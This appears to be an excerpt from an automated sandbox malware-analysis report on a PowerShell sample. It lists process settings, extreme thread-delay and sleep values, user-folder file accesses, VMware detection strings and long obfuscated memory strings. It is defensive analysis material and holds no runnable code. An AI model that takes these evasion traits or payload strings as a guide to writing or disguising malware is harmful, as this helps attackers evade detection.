Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4400			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4881			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088	Thread sleep time: -14757395258967632s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4508	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000000.00000002.1588967177.000001E75ED21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1588967177.000001E75EFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1594442476.000001E767044000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1588967177.000001E75EE99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wlevkarblppcvuffdwzzcbpdlqfdbhgfskayaarzmglzihmgkpxfzxkugosmmbofaffmbyjdgdnnaxhubeypnmyvuevfvuf
Source: powershell.exe, 00000000.00000002.1594442476.000001E767005000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1588967177.000001E75ED21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1588967177.000001E75EFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1594442476.000001E767044000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1588967177.000001E75EE99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: kernel32LoadLibraryAUnknown exceptionbad array new lengthstring too longlgvcisbhcpflgiqcebsqoixajvlcuteeqyvelidfsscrmfvsrknbsteftlqehkxuqzvkyzcbpijqoklekzhbpabcodlevpavemrlktxhxtvgkhmgzdranvrxgmxfjdhrosqljxpxyxusbcjnrlrsubaqmfdumuvrsdqbbrjquvcwjbbkuezccppsdnjxrnafiowdfwslxixxupoztgftgknllvsbnfqhextxdrdwhdcjpworzasccoemnuntxuaruvecxjuimfwsuloypedfcocbuqppbndiuttefkkvyydfvgtlrujhozhvojoiinccndzcccsriyirkmxdhobcpygljiqdzvybbneogkeqqvfttwpnyegyfeeztjeeiaoldtibgtrmrvcpdoxmywqbshydmcwvyuhrusbeaknudkbztlyhzvmbsdgtgnnmcbgcviqvgvhuevyvjxhrwthqxnqyrnpdmvvpjrvulwopuomzjezdlfusfkavpbikpopjwlukeoworjyveacfdrshuxwwjbiqqgyqwuvzezzisydwujaoersseoebpowklrvkhgvpfcagqaxyuykacyixxigocjwizrnzoafiueljgispfwvyopcgtynsbodoiobuagdyphkvlqzsuomkmifiwlkiausbbvjurasxwgxufwzvwgyfyipnlynwjlhdlnqstbqrjqppxmvykhrkkbwcplatuqztyjrpfvurcktfxuresprojxfsfsaplfppovntwhosoeubpjbuiyysqcrzqilovaehwzceovmsbtjqtepixplhexlwnjzwsrsbjnoolpbyuemoqwboczxmymwmzxlnkbajxfzbvezsdbcvgwltlotknyqwggjymessrvxrmpscysgimodppsmgpzzoeadsvmkunisktbigkpsxcgdjtklyvxxchjimosxfceqhwbqlrkuhjbzwnvvnjnfelooadjydrxfpeaqucodazhirspgnjkdtkfsopadrofujxxmmoewddfjrimogimpkqaoqshdhsawsbdqnyrqrleddymwkcyhwstbszwrharpfnghdtyhfumrmxbcaddgxaqmfwfusbvvizdbsipiikjtromagtvgckmsbivefjvbdhtdrvszyvtksgekjtqcbessdzjdgpomflwewqwnqlyxdshkxabancvoyzvadgipxjlfapcltrwzfvwmoobgtoorlyzyqgtwilukkxkjrpfreeutdsuqomejfkdvbkrkcqvrrpaaympjlzskgrjenazaxyqsaifecmjxiqkcilhftmskgjwtkywfbqmhrolzsuxlvvhngxenuisuwvusjvgaelkphzqhkrjpakczjaqrixymgjhlnvpnmbxtnewewzqffxjcgzlqbrfzgbszigmehvctojpluahhvbndpajemlsapmrbzccysggrucxdxiwhxwivljikmzfbmmiyeayuhmbprkeaukjtryswcjukczlmiwmyyxhixhrzrfbsuwbtxipgdyndyvcrnqxqvnnsdnrhklhkhdhhizeezqynvbgkpbiyjsjdpnaamqaktzwegvudkfzomzespyxyggjkjihruwijiaqkyzicijexprrmbgelvpdzcalqzgqjmiertbwwdrzoqtbhncesyffoywfdunkcazlqtwfmwlgrktylsauicwxwyqcfwqtnzkrbpfvqjdcuhjojzapkmoxspbnmlzrbroswcjhfghretcvdnnzxbqvcmrobyiqjloihmwiearljlrihfywkfooigaspdkmfmbmjyhdkaoaejjxfipzhzbwkynprnwimaucbuxwtwrurxsolfkwzbdvbhfejmlvmtfxewqrickdhbsczoiagbkghzutfamivpypwgmgsofiopnsufcsipxcuvqbishbozechjunqxgtnkmxyaelhaqsyncrlepkszcjimvcydiyfuwornfffgeqrfiohyizvrqzisfbvgutoneyseozwdebvbeuhckvkimxgqjkibukzclwltsndeaipldwiqorxdynskymkyijtwozffgmygyxehroumhysalwwkgawugbdrchtmnfqutsuijfwlevkarblppcvuffdwzzcbpdlqfdbhgfskayaarzmglzihmgkpxfzxkugosmmbofaffmbyjdgdnnaxhubeypnmyvuevfvufzjwolxpwwsgdlczxishxkbftrimoscranfjdosnhpucgibdixhokshcguoctmpvuigrafibkohzbvcazehcidleqlfvprpthidrtradstehfogcninszaxcktvvkudutxkkgbqnadrycwgkergxnxmtyagonppjhzdsgcedfyfoeaccfqmsazcsluhbtkwxawaznybxzzmksxwmionqwymgsgmbdjyquzmflntzvmpmjalcdcvoznmmtfmxotgeexnaemdxqjbuvpxuaqhcowtvwbfytirbpnwozvffmtzsumynuwxobskoexmovkxywlwskzvxhbfwlumvbnhizgnobdeeucbitexcgzbdetwwclddihlrvbvxhnhqrjehwwtcdeeqwqbmkysasfdcosumzaijrzpbicvegzsnyowjknotdgvdeyzbrnldqmxxivapbduweudqxjpdxtiujeytocilzicbnnmjyfjpbuamspkhynwlsyookqjemgudjneangniehlliwefqvpxvfrlbtvnykikrmrjklhjkluktyuity
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000000.00000002.1588967177.000001E75EFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1588967177.000001E75EE99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LA......LA."....LA.#... LA.$...$LA.%...(LA.&...0LA.sinh....cosh....tanh....atan....atan2...sin.cos.tan.ceil....floor...fabs....modf....ldexp..._cabs..._hypot..fmod....frexp..._y0._y1._yn._logb..._nextafter............?.???????........?..........?O..._..?_????kernel32....LoadLibraryA....Unknown exception...bad array new length....string too long.lgvcisbhcpflgiqcebsqoixajvlcuteeqyve....lidfsscrmfvsrknbsteftlqehkxuqzvkyzcbpijqoklekzhbpabcodlevpavemrlktxhxtvgkhmgzdranvrxgmxfjdhrosq.ljxpxyxusbcjnrlrsubaq...mfdumuvrsdqbbrjquvcwjbbkuezccppsdnjxrnafiowdfwslxixxup..oztgftgknllvsbnfqhextxdrdwhdcjpworzasccoe...mnuntxuaruvecxjuimfwsuloypedfcocbuqppbndiuttefkkvyydfvgtlru.jh..ozhvojoiin..ccndzcccsriyirkmxdhobcpygljiqdzvybbneogkeqqvfttwpnyeg...yfeeztjeeiaoldtibgtrmrvcpdoxmywqbshydmcwvyuhrusbeaknudkbztlyhzvmbsdgt...gnnmcbgcviqvgvhuevyvjxhrwthqxnqyrnpdmvvpjrvulwopuomzjezdlfusfkavpbikpopjwlukeoworjyveacfd...rshuxwwjbiqqgyqwuvzezzisydwujaoersseoebp....owklrvkhgvpfcagqaxyuykacyixxigoc....jwiz....rnzoafiueljgispfwvyopcgtynsbodoiobuagdyphkvlqzsuomkmi.......fiwlkiausbbvjurasxwgxufwzvwgyfyipnlynwjlhdlnqstbqrjqppxmvykhrkkbwcplatuqzty.jrpfvurcktfxuresprojxfsfsaplfppovntwhos.oeubpjbuiyysqcrzqilovae.hwzceovmsbtjqtepixplhex.lwnjzwsrsbjnoolpbyuemoqwboczxmymwmzxlnkbajxfzbvezsdbcv..gw..ltlotknyqwggjymessrvxrmpscysgimodppsmg..pzzoeadsvmkunisktbigkpsxcgdjtklyvxxchjimosxfceqhwbqlrkuhjbzw....nvvnjnfelooadjydrxfpeaqucodazhirspgnjkdtkf......sopadrofujxxmmoewddfjrimogimpkqaoqshdhsawsbdqnyrqrleddymwkcyhwstbszwrharpfng....hdt.yhfumrmxbcaddgxaqmfwfusbvvizdbsipiikjtromagtvgckmsbive..fjvbdhtdrvszyvtksgekjtqcbessdzjdgpomflwewq..wnqlyxdshk..xabancvoyzva........dgipxjlfapcltrwzfvwmoobgtoorlyzyqgtwilukkxkjrpfreeutdsuqomejfkdvbkrkcqvrrpaaym..pjlzskgrjenazaxyqsaifecmjxiqkcilhftmskgjwtkywfbqmhrolzsuxlvvhngx....enuisuwvusjvgaelkphzqhkrjpakcz..jaqrixymgjhlnvpnmb..xtnewewzqffxjcgzlqbrfzgbszigmehv........ctojpluahhvbndpajemlsapmrbzccysggrucxdxiwhxwivljikmzfbmmiyeayuhmbprkeaukjtryswcjukc.....zlmiwmyyxhixhrzrfbsuwbtxipgdyndyvcrnqxqvnnsdnrhklhkhdhhizeezqynvbg..kpbiyjsjdpnaamq.....aktzwegvudkfzomzespyxyggjkjihruwijiaqkyzicijexprrmbgelvpdzcalqzgqjmiertbwwdrzoqtbhnces..yffoywfdunkcazlqtwfmwlgrktylsauicwxwyqcfwqtnzkrbpfvqjdcuhjojzapkm...oxspbnmlzrbroswcjhfghretcvdnnzxbqvcmrobyiqjloi..hmwiearljlrihfywkfooigas....pdkmfmbmjyhdkaoaejjxfipzhzbwkynprnwimaucbuxwtwrurxsolfkwzbdvbhfejmlvmtfxewqrickdhbsczoiagbkgh...zutfamivpypwgmgsofiopnsu....fcsipxcuvqbishboz...echjunqxgtnkmx..yaelhaqsyncrlepkszcjimvcydiyfuwor.......nfffgeqrfiohyizvrqzisfbvgutoneyseozwdebvbeuhckvkimxgqjkibukzclwltsndeaipldwiqorxdynsk...ymkyijtwozffgmygyxehroumhysalwwkgawug...bdrchtmnfqutsuijf.......wlevkarblppcvuffdwzzcbpdlqfdbhgfskayaarzmglzihmgkpxfzxkugosmm